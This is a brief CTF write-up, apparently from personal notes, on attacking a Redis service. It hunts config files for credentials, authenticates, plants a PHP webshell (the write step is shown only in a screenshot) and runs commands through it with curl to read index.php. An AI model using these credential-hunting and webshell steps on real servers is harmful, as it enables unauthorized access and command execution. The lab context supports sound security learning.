![f0ccb3f7478a42d53991ee05538f7424.png](769c59152c844e42919d614c95feb2d8.png) Let's see if the cli is available `redis-cli` ![82a65880b0adfd44482e5a89d64f7fc9.png](0c70a2303e294ff5bd6c10500eefd363.png) It is but we need to auth. I don't really want to go the curl route, so let's see if we can find some creds `find / -name *.conf 2>/dev/null | grep redis` ![ecab58ed93ef8a72aa4ba593ed2616d3.png](7105a6dd6c60414ababf18899af26642.png) ![8fcf0726bc694541d3dd249f1f8db43d.png](a4df041b4ef546258326e3903fa71ba7.png) Nice. Back to the cli ![70225906f664490e0990b8c0b7587e30.png](79f89b8b77bc41d3a979f5932491a1f0.png) So now we're authenticated, we can try getting RCE. ![a73fa0c17772e253b57aab623dfe5d68.png](aebffc4de04546a8b0d25d9ec2868617.png) That should give us a very basic webshell that we can curl. `curl http://localhost/rce.php?cmd=ls --output -` ![76cbb1aadc871689100db9a51801fa36.png](2e208eec6eeb4613ad0d3abc38f5557e.png) It's a mess, but it works. We can see `maintenance.php` our `rce.php` and `index.php`. The challenge wanted us to read `index.php`. `curl http://localhost/rce.php?cmd=cat+index.php --output - ` ![13ef2ac235dc36cd5173654e14f45c00.png](aa1e2a4d47404c7089094fe814310f6f.png) Andddd that's all it wanted. --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #redis #ctf #rce #web Related: